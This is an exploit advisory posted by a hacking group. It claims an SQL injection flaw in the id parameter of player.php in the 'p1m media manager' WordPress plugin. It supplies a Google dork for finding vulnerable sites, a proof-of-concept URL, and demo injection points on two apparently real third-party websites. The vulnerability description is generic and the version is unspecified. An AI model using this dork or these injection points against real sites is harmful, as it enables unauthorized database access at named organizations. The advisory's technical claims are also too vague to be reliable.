WordPress p1m media manager plugin SQL Injection Vulnerability

================================================================================
____ _    _    ____ _  _    ____ _  _ ___  ____ ____
|__| |    |    |__| |__|    |__| |_/  |__] |__| |__/
|  | |___ |___ |  | |  |    |  | | \_ |__] |  | |  \

================================================================================
####
# Exploit Title: WordPress p1m media manager plugin SQL Injection Vulnerability
# Author: KinG Of PiraTeS
# Facebook Profile: www.fb.me/cr4ck3d
# Facebeook Page : www.fb.me/serial.crack
# Facebeook Page : www.fb.me/Cars2Luxe
# E-mail: t5r@hotmail.com / cr4ck3d@offdr5cax.dz
# Category:: webapps
# Google Dork: inurl:"/wp-content/plugins/p1m-media-manager/"
# platform : php
# Vendor: NA
# Version: x.x.x
# Security Risk : High
# Tested on: [Windows 7 Edition Intégrale 64bit ]
####


##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | * ------>  KinG Of PiraTeS * The g0bl!n <-------- * |
# | ------------------------------------------------- < |
###

#
1)Introduction
2)Vulnerability Description
3)Exploit

>> ----------------------------------------------------------------
1)Introduction
==============
2)Vulnerability Description
===========================

U can inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database.
Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password.
With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

3)Exploit
=========

http://Localhost/{Path}/wp-content/plugins/p1m-media-manager/player.php?id=-208


[~] P0c [~] :
============

Vuln file in :

http://Localhost/{Path}/wp-content/plugins/p1m-media-manager/player.php  <<-----|

[~] D3m0 [~] :
=============
http://www.mainstreetpres.org/wp-content/plugins/p1m-media-manager/player.php?id=295[Inj3ct Here]
http://www.greatdividecalvary.com/wp-content/plugins/p1m-media-manager/player.php?id=208[Inj3ct Here]
.
.

####

Peace From Algeria

####


//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information